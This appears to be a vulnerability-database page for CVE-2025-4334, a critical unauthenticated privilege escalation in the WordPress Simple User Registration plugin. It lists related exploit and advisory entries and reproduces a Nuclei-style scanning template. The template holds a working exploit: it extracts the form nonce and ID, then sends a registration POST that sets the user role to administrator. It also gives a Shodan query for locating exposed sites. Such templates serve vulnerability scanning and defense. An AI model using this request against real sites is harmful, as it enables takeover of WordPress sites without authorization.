| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| Exploit for Improper Privilege Management in Najeebmedia Simple_User_Registration | 26 Jun 202511:43 | – | githubexploit | |
| Exploit for Improper Privilege Management in Najeebmedia Simple_User_Registration | 8 Jan 202615:11 | – | githubexploit | |
| Exploit for Improper Privilege Management in Najeebmedia Simple_User_Registration | 8 Jan 202615:04 | – | githubexploit | |
| Exploit for Improper Privilege Management in Najeebmedia Simple_User_Registration | 18 Aug 202509:37 | – | githubexploit | |
| Exploit for Improper Privilege Management in Najeebmedia Simple_User_Registration | 25 Oct 202516:12 | – | githubexploit | |
| CVE-2025-4334 | 26 Jun 202502:50 | – | circl | |
| WordPress plugin Simple User Registration 安全漏洞 | 26 Jun 202500:00 | – | cnnvd | |
| CVE-2025-4334 | 26 Jun 202502:06 | – | cve | |
| CVE-2025-4334 Simple User Registration <= 6.3 - Unauthenticated Privilege Escalation | 26 Jun 202502:06 | – | cvelist | |
| EUVD-2025-19388 | 26 Jun 202502:06 | – | euvd |
| Source | Link |
|---|---|
| github | www.github.com/Nxploited/CVE-2025-4334 |
id: CVE-2025-4334
info:
name: Simple User Registration <= 6.3 - Unauthenticated Privilege Escalation
author: pussycat0x
severity: critical
description: |
The Simple User Registration plugin ≤ 6.3 is vulnerable to privilege escalation. It lacks proper restrictions on user meta values during registration. Unauthenticated attackers can exploit this to register as administrators.
reference:
- https://github.com/Nxploited/CVE-2025-4334
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-4334
epss-score: 0.02055
epss-percentile: 0.78947
cwe-id: CWE-269
impact: |
An attacker can exploit this vulnerability to register with administrator privileges, gaining full control over the WordPress site.
remediation: |
Update the Simple User Registration plugin to a version newer than 6.3 when available, or remove the plugin if not essential.
metadata:
verified: true
max-request: 2
vendor: lifeisincredible
product: simple-user-registration
shodan-query: http.component:"wordpress" && http.html:"/wp-content/plugins/simple-user-registration/"
tags: cve,cve2025,wordpress,wp-plugin,wp,intrusive,plugin,simple-user-registration,vuln
variables:
username: "{{randstr}}"
email: "{{randstr}}@{{rand_base(5)}}.com"
password: "{{to_lower(rand_text_alpha(8))}}"
http:
- raw:
- |
GET /register/ HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 417
action=wpr_submit_form&wpr_form_id={{wpr_form_id}}&wpr_nonce={{wpr_nonce}}&_wp_http_referer=%2Fregister%2F&wpr%5Bwp_field%5D%5Buser_login%5D={{username}}&wpr%5Bwp_field%5D%5Bfirst_name%5D=first{{username}}&wpr%5Bwp_field%5D%5Blast_name%5D=last{{username}}&wpr%5Bwp_field%5D%5Buser_email%5D={{email}}&wpr%5Bwp_field%5D%5Bpassword%5D={{password}}&wpr%5Bwp_field%5D%5Bconfirm_password%5D={{password}}&wpr%5Bwp_field%5D%5Brole%5D=administrator
matchers:
- type: dsl
dsl:
- contains(body_1, "WPR Register")
- contains(body_2, "user_id")
- contains(body_2, "Registration Done")
condition: and
extractors:
- type: regex
internal: true
group: 1
name: wpr_nonce
part: body
regex:
- 'name="wpr_nonce" value="([a-f0-9]+)"'
- type: regex
internal: true
group: 1
name: wpr_form_id
part: body
regex:
- 'name="wpr_form_id" value="([0-9]+)"'
# digest: 490a0046304402206c052c83933c2db729ccee4a47ca1ebf3369f77ce289a18270043a791907ff1b02207518a03747c96c1040752657534df406551bcd7f425532abf1bfa4c0b53cc2ad:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation